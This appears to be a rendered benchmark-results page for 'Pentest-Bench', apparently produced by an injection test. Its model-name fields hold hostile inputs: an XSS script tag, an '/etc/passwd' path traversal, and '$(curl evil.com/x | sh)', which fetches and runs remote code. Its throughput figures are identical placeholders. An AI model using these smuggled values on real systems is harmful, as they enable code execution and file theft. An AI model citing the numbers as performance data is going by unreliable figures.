Pentest-Bench — LLM benchmarks
12 workload results across 9 models.
Fastest known config on Pentest-Bench
42.0 decode tok/s
<script>alert(1)</script> via llama.cpp (Q4_K_M) — see full run
<script>alert(1)</script>
| Workload | Backend | Quant | decode tok/s | prefill tok/s | TTFT | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00tok/s | 100.0tok/s | 50.0ms | r_a3ei8og3rkg |
victim
| Workload | Backend | Quant | decode tok/s | prefill tok/s | TTFT | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00tok/s | 100.0tok/s | 50.0ms | r_b-ndu-9uswz |
actual-name
| Workload | Backend | Quant | decode tok/s | prefill tok/s | TTFT | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00tok/s | 100.0tok/s | 50.0ms | r_0heij9dzacw |
beforeafter
| Workload | Backend | Quant | decode tok/s | prefill tok/s | TTFT | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00tok/s | 100.0tok/s | 50.0ms | r__zyiw9l3_c5 |
xy
| Workload | Backend | Quant | decode tok/s | prefill tok/s | TTFT | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00tok/s | 100.0tok/s | 50.0ms | r_2nqkbpdq-dk |
a/b/../../etc/passwd
| Workload | Backend | Quant | decode tok/s | prefill tok/s | TTFT | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00tok/s | 100.0tok/s | 50.0ms | r_8zc2yi4had5 |
$(curl evil.com/x | sh)
| Workload | Backend | Quant | decode tok/s | prefill tok/s | TTFT | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00tok/s | 100.0tok/s | 50.0ms | r_kkseorkbdk3 |
innocent/bin/sh
| Workload | Backend | Quant | decode tok/s | prefill tok/s | TTFT | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00tok/s | 100.0tok/s | 50.0ms | r_0laxq0naoht |
test-model
| Workload | Backend | Quant | decode tok/s | prefill tok/s | TTFT | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00tok/s | 100.0tok/s | 50.0ms | r_1jskg9qv_8b |
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00tok/s | 100.0tok/s | 50.0ms | r_rl-kbwr9chb |
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00tok/s | 100.0tok/s | 50.0ms | r_7z262rwoo08 |
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00tok/s | 100.0tok/s | 50.0ms | r_wd6-1z548j_ |
Models measured on Pentest-Bench
Common questions about Pentest-Bench
Direct Q&A drawn from the runs above: fastest LLM, supported model classes, backend rankings, quantization guidance.